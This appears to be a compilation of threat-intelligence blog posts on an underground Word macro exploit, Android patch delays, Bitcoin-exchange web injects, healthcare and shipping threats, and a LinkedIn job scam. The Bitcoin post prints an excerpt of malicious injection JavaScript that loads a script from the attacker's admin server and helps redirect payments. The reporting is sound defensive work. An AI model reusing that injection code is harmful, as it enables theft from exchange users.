MacroExp – a Combined Social Engineering and Exploit Attack

Combining an executable, usually malicious file with a standard Word or Excel file, unbeknownst to the user, has always been an aspiration for cyber-criminals. With such an asset, they could make the victim unwittingly install the malware, without raising his suspicions or AV vendor alerts when running an executable file. For this reason, requests for such services are frequently posted on underground forums, as cyber criminals search for easy ways to spread their malware files. Occasionally, this demand meets a supply, usually highly priced due to the opportunities it provides.

On this occasion, while monitoring Russian underground forums, we came across an advertisement for an exploit that targets Microsoft Office Word via Visual Basic Scripting for Applications feature. The exploit, referred to as MacroExp v 1.0.5 by the seller, first appeared for sale two days ago (on August 11), for $1,000. The price includes the exploit builder, as well as further updates and technical support.

According to the description on the forum, the exploit binds an executable file with a .doc file, making the .exe invisible to the victim. It is compatible with all Microsoft Office Word versions (2000-2013), as well as Windows OS x86 and x64. Since the presence of the executable file is invisible, it is not detected by AV and IPS systems, or firewalls.

The disadvantage of the method, as described by the seller, is the pop-up of a macro-enabling alert required for the actual running of the executable file. He suggests overcoming this obstacle by using social engineering methods.

A week ago, CISCO reported this attack vector, detected by its researchers, in the wild. It was used in spear-phishing attacks in such industries as banking, oil, television and jewelry. The starting point involved sending a Word file written specifically for the recipient. When clicking on the document, a macro alert popped up. Once enabled, it led to the download of an executable malicious file and launched it on the victim’s computer.

It is difficult to say if the same perpetrators are behind the both attacks, or it is just the same vector that is used in the both cases. On the one hand, one of the CnC domains discovered by CISCO was registered seven years ago, which may indicate that the threat actor has been in operation since at least 2007. On the other hand, the seller connected himself to the CISCO report, claiming that the described attack is his project. Moreover, he mentioned that more than 20 clients were already using the exploit, and that this was not the first version since its release. The matter will become clearer as more cases are identified in the wild, combined with more feedback from buyers on the forum.

Screenshots of the exploit in action uploaded by the sellerScreenshots of the exploit in action uploaded by the sellerScreenshots of the exploit in action uploaded by the seller

Mind the Gap – Mind your Android

Android holds approximately 80% of the global mobile market today. Due to the popularity of the Android operating system for mobile phones, it serves as a more attractive target for hackers and cyber criminals than iOS mobile phones.

Security researchers have discovered ways to take control over roughly 70% of Android devices via a Web page or apps – mostly devices that have outdated versions. Although Google releases patches approximately every four months, most of the devices will likely remain vulnerable to attack because they will not be updated.

Security consultant Graham Cluley accentuated this point when he said, “The fundamental problem is that they [Google] don’t control the hardware and software. Even though all these devices are Android-operated, they run different tweaked versions with different UIs and add-ons.

While the iOS operating system is only installed on Apple devices and it is relatively easy to obtain updates, security updates for Android OS devices are forced to pass through the mobile network operators and carriers – a hindrance that often takes a great deal of time.

The following chart describes the patching process for an Android device, from the first discovery of a vulnerability through to the repair that ultimately reaches the end-user device. The repair process at point C is typical for every software product. The repair software represented by point C is usually the end vulnerability window shown at point A.

Points D – G represent the repair process specific to Google; whenever a patch to Android becomes necessary, Google provides an update via its open source forum. The manufacturers produce the update, vendors release it and then the user installs the updated customized version of his operating system.

Chart showing the creating of a patch for an Android device
Chart showing the creating of a patch for an Android device

It should be noted that the patch release date is not the date when these updates are actually available to users. Once Google releases an update, the manufacturer must update it to suit his material. There is a possibility that the updates may never actually become available to the user, for example, if the vendor decides that distributing the update is too expensive for him.

As a result of the window of vulnerability and the different Google and the manufacturer release dates, hackers can use reverse engineering techniques to identify and exploit the vulnerability of a device by using the information found in the original published patch, or that of any other manufacturer who may have issued the patch at an earlier date.

Clearly, the fact that Google provides a secure platform for Android is insufficient – it is also important to ensure that their patches reach their targets, Android users, within the shortest possible time, to minimize the attack window.

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Cyber Threats to the Healthcare Industry

Written by Gal Landesman

Introduction

The healthcare industry is advancing rapidly, linking systems and medical devices to the Internet, adopting electronic health records and implementing regulatory reforms. Tremendous technological advancements in the medical industry bring with them a greater reliance on software-controlled devices and wireless technologies. These technologies are used in any visit to the doctor and in hospital wards. Many of them connect or have the capability to connect to the Internet. Alongside the opportunities presented, the industry is also a major target for cyberattack, mostly for financial motivationIn the following post, we will present some of the cyber threats currently faced by the healthcare industry.

In today’s environment, organizations are required to take responsibility for securing their networks and computers. Alarming vulnerabilities in medical devices have caused the FDA to issue guidelines for cyber security of the medical device industry. The U.S. Health Information Technology for Economic and Clinical Health Act, for example, permits the fining of hospitals and other organizations up to $1.5 million a year for serious security incidents. Unfortunately, the industry is falling short of complying with said security standards. Last year, for example, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) performed a random audit of 20 healthcare organizations, 19 of which failed.

(Note –  this blog post is an excerpt from our report: ”Cyber Threats to the Healthcare Industry”. If you are interested in receiving the full report, please write to: info@sensecy.com).

Threats to the Healthcare Industry

According to security experts, cyber criminals are shifting their focus from the financial industry to the healthcare industry, today an easier and more profitable target. Healthcare records contain valuable information for cyber criminals, such as social security numbers and personal information. Credit card records sell for an average of $2, while medical records can fetch about $20 on the black market. According to the Experian 2014 Data Breach Industry Forecast, the healthcare industry is likely to make the most breach headlines in 2014, despite the fact that 2013 was a year of mega-breaches in the healthcare industry.

Hackers' ransom note, after breaking into a Virginia government website
Hackers’ ransom note, after breaking into a Virginia government website

Identity and Information Theft

Medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, prescription drugs and goods, or attempts to commit fraudulent billing. Information theft can include the theft of personal information for malicious use, such as selling it on the DarkNet. According to a Ponemon Institute 2013 survey, medical identity theft claimed more than 1.84 million U.S. victims in 2013. Medical identity theft is on the rise in the U.S., where the number of victims in 2013 increased by 19%.

Medical Device Breaching

Over the last 15 years, a growing number of medical devices have become interconnected through hospital networks, the Internet, smartphones and other devices, increasing their vulnerability. This has not escaped the attention of the FDA who recently issued new guidelines to biomedical engineers, healthcare IT and procurement staff, medical device user facilities, hospitals and medical device manufacturers.

The new FDA guidelines came in response to the 2012 findings of a governmental panel that revealed that computerized hospital equipment is increasingly vulnerable to malware infection that can potentially render these devices temporarily inoperable. Many of the devices run on Windows variants. They are interconnected through internal networks to the Internet and are also exposed to laptops in the hospitals, making them vulnerable to malware.

An example of the implications that could be caused by such systems was demonstrated by the medical-device panel from the NIST Information Security & Privacy Advisory Board, who described fetal monitors in intensive-care wards that were slowed down due to malware infection. This problem can affect a wide range of devices, such as compounders, diagnostic equipment, etc.

A report issued by the Government Accountability Office (GAO) warned mostly about vulnerabilities found in wireless implanted defibrillators and insulin pumps, but thousands of other network-connected life-saving devices are also vulnerable. Malware in medical devices is probably much more prevalent than we know, since most of it is not reported to the regulators and there are no records. The OS updating process for medical devices is an onerous regulatory process.

Cyber threats to medical devices (from the GAO report)
Cyber threats to medical devices (from the GAO report)

Conclusion

We believe that the healthcare industry is facing major threats from cyberspace. These threats encompass large areas of the industry and may become a greater burden for it, compromising patient safety, and causing financial and commercial damage to the associated bodies.

SenseCy is coming to town! Come meet us at the RSA USA 2014 conference, February 24-28, in San Francisco.

Hacking as an Artistic Expression

Hackers are creative people. Everybody knows that. They have to be technically creative in order to outsmart security mechanisms, perform their antics and get away without being caught (sometimes).
But artistic creativity? Not the first thing we associate with hacking. However, after witnessing their creative works of art, we felt compelled to share these with you.
So you are welcome to enjoy the works of the “Russian classical painters”, the “surrealist hacktivists designers” and the “Iranian masters”:

A Russian hacking forum
A Russian hacking forum
Portal of Russian hackers
Portal of Russian hackers
Another Russian hacking forum
Another Russian hacking forum
A carding shop
A carding shop
#OpUSA (May 7, 2013)
#OpUSA (May 7, 2013)
#OpPetrol (June 20, 2013)
#OpPetrol (June 20, 2013)
#OpEgypt
#OpEgypt
Iranian Cyber Army (ICA)
Iranian Cyber Army (ICA)
Ashiyane Digital Security Team (ADST)
Ashiyane Digital Security Team (ADST)

Cyber Threats to the Shipping Industry

Introduction

Several cyber threats pertaining to the shipping industry have been reported of late, illustrating the vulnerability of this industry – a fact that cyber criminals, terrorists and even hacktivists are already exploiting.

(Please note –  this blog post is an excerpt from our report: “Cyber Threats to the Shipping Industry”. If you are interested in receiving the full report please write to: info@sensecy.com).

Vulnerabilities of Automatic Identification System Exposed

Researchers at the Trend Micro security firm reported they had identified major security breaches in the Automatic Identification System (AIS). The AIS is a global system that identifies and tracks vessels in real time. The system periodically transmits the position, speed and heading of a vessel, among other information. It was mandated by the International Maritime Organization (IMO) in all passenger and commercial vessels over 300 metric tons. During an experiment, the researchers managed to break into the system and alter data in real time.

The researchers were able to spoof the route of a vessel to spell "PWNED", meaning "hacked"
The researchers were able to spoof the route of a vessel to spell “PWNED”, meaning “hacked”

The breach was carried out in two phases:  first they identified the main AIS Internet providers that collect and distribute AIS information, and exploited their vulnerability to manipulated data:

  • Modification of all ship details such as position, course, cargo, flag, speed, name, MMSI (Mobile Maritime Service Identity) status, etc.
  • Creation of fake vessels with the same details, e.g. having an Iranian vessel with nuclear cargo show up off the coast of the U.S.

In the second phase, they exploited flaws in the AIS communication protocol mandatory in hardware transceivers in all vessels. Using a US$200 transceiver (using Marine VHF channels 161.975 MHz and 162.025 MHz) they were able to:

  • Permanently disable the AIS system on a vessel, forcing the ship to stop communicating its position, and also stop receiving AIS notifications from all vessels in the vicinity.
  • Issue a fake CPA alert (Closest Point of Approach) and trigger a collision warning alert.
  • Fake a “man-in-the-water” distress beacon at any location that would also trigger alarms on all nearby vessels.
  • Send false weather information to a vessel, e.g. storm approaching, to route around.
  • Cause all ships to transmit AIS traffic much more frequently than normal, flooding the channel and blocking communications from marine authorities and other vessels in range.

This security breach allows hostile entities to alter the real-time data of vessels sailing the seas, with the potential to cause economic damage, in addition to the serious safety risks to vessels or sabotaging the activities of marine enforcement agencies (police, coastguard etc.). The security gap is particularly worrisome because it does not require expensive equipment or impressive hacking capabilities to utilize it. The threat is that terrorist organizations could exploit this vulnerability, which could lead to serious physical consequences and even the paralysis of maritime traffic in a particular area.

Cyber Attack Breaches Port Security; Container Hijacked

On October 16, 2013, Europol announced it had exposed a network of drug traffickers who recruited hackers to breach IT systems in the port of Antwerp, Belgium. The purpose of the breach was to allow hackers to access secure data giving them the location and security details of containers (that contained smuggled drugs worth billions of dollars), allowing the traffickers to send in truck drivers to steal the cargo before the legitimate owner arrived.

The operation (which took place over a two-year period) went undetected by the port authorities and shipping companies involved. It was apparently uncovered with the recent arrests of members of the “Silk Road” website who sold drugs on the DarkNet in the U.S. The investigation was carried out by a team from Europol that in a related series of raids managed to confiscate containers holding cocaine and heroin worth hundreds of millions of dollars.

KVM devices used in the Antwerp attack
KVM devices used in the Antwerp attack

The breach of the port and shipping companies’ computer systems began with a spear-phishing attack, i.e. sending innocent-looking emails with malicious contents to employees of transportation companies working in the port of Antwerp. When the ring members saw that this channel had become blocked by enhanced IT security, they physically broke into the companies’ offices and installed KVM (keyboard, video and mouse) switches to enable remote access to the computer systems. The KVM switches were assembled and prepared in a professional manner and included miniature PCs concealed inside electrical power strips, external hard drives, as well as keyloggers disguised as USB keyboard port converters. Although some of this equipment was designed simply to steal login credentials, the hackers appear to have used wireless cards to study and possibly control the logistics systems in real time. The group then sent its drivers to the port and provided them with all the necessary certificates and release codes to retrieve the containers.

Weaponization of Cyber Coins – The Next Attack Vector?

Written by Jeremy Jacobson

It’s getting kind of hard to ignore all the buzz surrounding bitcoins these days. The cryptocurrency, which allows users to convene peer-to-peer (P2P) monetary transactions with a significant degree of anonymity, has exploded in value, currently hovering around $900 per bitcoin, leading many to speculate about the long-term viability and implications of cryptocurrencies in general. However, lost amid the debate is serious discussion over the next logical step in the evolution of encrypted P2P currencies: the eventual weaponization of the cyber-coin.

Bitcoin itself has already become a favorite among cyber-criminals. Whether laundering money, selling drugs (remember Silk Road?) or procuring the services of a hit man, the ability to anonymously carry out monetary transactions over the Internet has made online crime both easy and relatively risk free. This, and the fact that at least 2,600 stores accept bitcoins worldwide (as do the Sacremento Kings basketball team) according to Robert J. Samuelson of the Washington Post, has led to the massive inflation in Bitcoin’s value, and has attracted investors looking for an easy payday.

Bitcoin

Like any good idea, Bitcoin has also attracted numerous imitations, which have resulted in cryptocurrencies ranging from the very serious to the Bizarre. For example, Litecoin is a cryptocurrency almost identical to Bitcoin that purports to incorporate three main improvements over the Bitcoin software. In contrast, the Dogecoin plays off the popularity of the “Doge” meme, which was rated 2013’s meme of the year, while the Coinye cryptocurrency uses the likeness of rapper and pop-culture icon Kanye West to market its brand (West’s lawyers are still attempting to shut the coin down). According to Carlotte Lyton of the Daily Beast, there are at least 71 types of crypto currencies out there, some of which are suspiciously reminiscent of the old Wall Street pump-and-dump scheme.

Enter Allahcoin. This P2P Islamic currency offers similar software to Bitcoin, but with a couple of modifications. One new feature is that for every Allahcoin mined, 10% will be donated to the Muslim Brotherhood foundation. This coin not only offers a brand new cryptocurrency, but an easy and anonymous way for users to donate to their favorite Islamist organization!

The Muslim Brotherhood  does not fit the traditional definition of a terrorist organization. However, it may not be long before jihadist groups with ties to the Brotherhood, or similar-minded groups, catch on to the advantages of the nascent crytocurrency technology. Although, like criminals, fundraising and money laundering are the most obvious benefits for such groups, it is possible that terrorists could one day weaponize their own crypto currency.

How would a weaponized cryptocurrency work? It is hard to say exactly, but current abuses of alternative cryptocurrencies may hint at an answer. For instance, some currencies are designed suspiciously similar to pump-and-dump schemes. An attacker could disperse a virus-laced currency in an identical fashion at the investment scheme’s pump phase. After sufficiently spreading the currency, the attacker could activate a trigger, spreading a virus through users’ virtual wallets. Depending on the type of attack, the virus could expose users’ identities, neutralize their virtual wallets, rip off their accounts, or steal information from their networks. In a worst case scenario, terrorists may target tech contractors and infect their computers and online accounts via the currency, thus increasing the possibility of the virus transferring to their clients’ networks (similar to how the Stuxnet virus may have been transferred to an Iranian nuclear facility, according to Ralph Langner writing in Foreign Policy).

Just as P2P file sharing through software such as Limewire and eMule eventually became natural habitats for the spread of viruses, it is likely that cryptocurrencies will one day be weaponized. The question is not if, but when the first attacks will occur, who will be behind them, and how much damage will they cause.

The “Total Sting” – 419 Scam Evolved

Have you ever received a suspicious looking email, urging you to send money or provide your banking account details to someone you don’t know? Sure you have.

This is one of the Internet’s most common scams, and it has many names – “Phishing”, “advanced fee fraud”, “Nigerian sting” or 419 Scam (this name refers to the article of the Nigerian Criminal Code dealing with fraud).

The logic is simple – send numerous phishing emails, and you can expect that at least some people will be gullible enough to provide you with money or banking details. When you send millions of emails even a meagre return percentage is enough to generate hefty sums. But there’s a catch – most people are by now aware of this and are reluctant to reply or even open emails which do not appear to have been sent from a known acquaintance or organization. So 419 scammers have to evolve in order to survive. One way of doing so is utilizing social networks, and especially LinkedIn, since people tend to see it as a professional network and trust information and requests to connect which originate there.

Enter the “Total Sting”.

Image
An open position as Senior Project Manager at Total Oil as published on LinkedIn

The story is simple yet entails great sophistication and creativity. As a LinkedIn member you one day notice a lucrative job opening – Total oil, one of the leading oil and gas companies are looking to opening new offices at your country and are recruiting a senior project manager.

You submit your application via LinkedIn and a few days later you receive a formal looking email from Gérard Lamarche at Total HR Dept. (even the email address looks legit: apply@totalconsult.int.tf). Out of curiosity you check who this gentlemen is and find that he is a director at Total (http://total.com/en/media/news/press-releases/20120116-appointment-gerard-lamarche-director-total-sareplacing-thierry-rudder).

Image
The Invitation Letter (allegedly) received from Total Oil

Now comes the fun part. The email includes three attachments. Since you know that this is a reply email to a submission you’ve sent you don’t hesitate to open these PDF files. There’s a very attractive job description document, an officially looking invitation for an interview in London and another letter describing the technicalities of the interview. You are cordially invited to come to London and interview for the lucrative job at Total Recruitment offices, Human Resources department, TOTAL UK Limited, 40 Clarendon Road, Watford, Hertfordshire WD17 1TQ.

Out of curiosity you Google the address and find that this is indeed the official address of Total in the UK. There’s only one catch – you need to make the travel arrangements through a specific agency (but don’t worry, you will be reimbursed upon arrival). The contact person’s name is Dr. Kenneth Cole (hmmm) and the travel agency name is Belair travel and tours (located at Air Malta House, 314-316 Upper Richmond Rd, London SW1). Now things are looking a little more suspicious.

Image
A letter requesting to arrange travel through a designated travel agency

You decide to look more carefully into this. You phone the number but there is no answer. You check the website of the company, located in east Kensington, London, and find that they are using completely different phone numbers. ( http://www.belleair.co.uk/contactbelleair).

You search a little more on the web and immediate see that this is indeed a scam. (http://www.419baiter.com/_scam_emails/01-08/419_emails_total-oil-company-job-scam.html).

So you were just one of many lured into a simple phishing scam? Not quite.

This is an evolution of the classic 419, and this is why: the perpetrators of this specific scam have done almost everything possible to overcome the identifiable pitfalls of Phishing emails.

This scam is reactive, it is targeted at specific audience, it is officially looking and does not ask directly for money or details in advanced. Someone had to create a fake company profile on LinkedIn, post an authentically looking position, receive and read emails, fabricate authentically looking documents (complete with logo and an actual executive name), enter the job seeker name into the documents title and send it all back. And since this is a reply to an email/job submission the recipient is much more likely to open and perhaps respond. The logical evolution to this scam is that the scammers will create a false website (which will appear completely real) and let you submit your details there, making this fraud almost perfect.

I would like to Thank Itay and Tanya who shared this with me and assisted me in describing this in detail.

P.S. we checked and the PDF files were not weaponized (i.e. carrying Malware). had they been, this would have been a Spear-phishing campaign and a darn good one too.

P.s. 2. if you ever notice this type of scam please notify the good people of LinkedIn at phishing@linkedin.com (we have).

Cyber Intelligence Yearly Report

Executive Summary

The SenseCy Cyber Intelligence team, along with our partners ClearSky and Aman Computers, has been providing intelligence monitoring services for leading financial institutes in Israel for over a year. Our unique methodology of using “Virtual Entities” to infiltrate cyber-attack groups and the underground has proven successful in alerting regarding imminent cyber threats, as well as detecting new Malware types and monitoring broader cyber trends.

The following is an extract of an annual report sent to our customers. To receive a copy, please send a request to: info@sensecy.com

Main Findings

This report comprises an analysis of data amassed from major cyber incidents pertaining to financial institutions in Israel over the past year, as reflected in the alerts, weekly and monthly reports produced by our Cyber Intelligence team. The analysis can be summarized as follows:

  • The majority of Hacktivist campaigns were directed against the government and financial sectors.
  • Interestingly, we have found no correlation between the attack dates and any symbolically significant dates.
  • The main threat actors were political activists and political cyber warriors.
  • The more popular attack types were data leakage (exploitation) attacks, resource depletion attacks, injection attacks and social engineering attacks.

Additionally, the report includes an analysis of data collected on the sale of attack tools on underground forums (mostly Russian). The analysis comprises 42 tools and exploits, summarized as follows:

  • The most popular tools for sale on the underground are bots and exploits (some sold as exploit kits), followed by Trojan horses.
  • Their main purpose is stealing financial information.
  • The main functions of the tools sold included running Web injection attacks and grabbers, intercepting and forwarding SMS messages and calls from cell phones, Keyloggers, and DDoS attack tools.
  • Java was the program identified as most vulnerable to attack.
  • The most vulnerable Web browser was Internet Explorer, followed closely by FireFox.
  • The most vulnerable operating system was Windows.

Event Classification

This summary is based on major cyber events pertinent to the financial sector, as published in the various reports we issued throughout the year. The analysis is based on data from over 40 cyber events.

The majority of incidents reported are specifically relevant to the financial sector, but also include a category for general threats to Israeli websites, mainly from political threat elements. This classification is evident in the graph below, with the leading threats being financial, data loss, defacement and DDoS.

Classification

Timeline of Events 2013

Timeline

Classification of the Sale of Attack Tools on the Underground

The summary was based on all malware/exploit sales for the past year that appeared on underground forums, mainly Russian forums, monitored by us – more than 40 in total. The majority of tools for sale are bots, followed by exploits or exploit kits. Trojan horses are also offered for sale, but less frequently.

Underground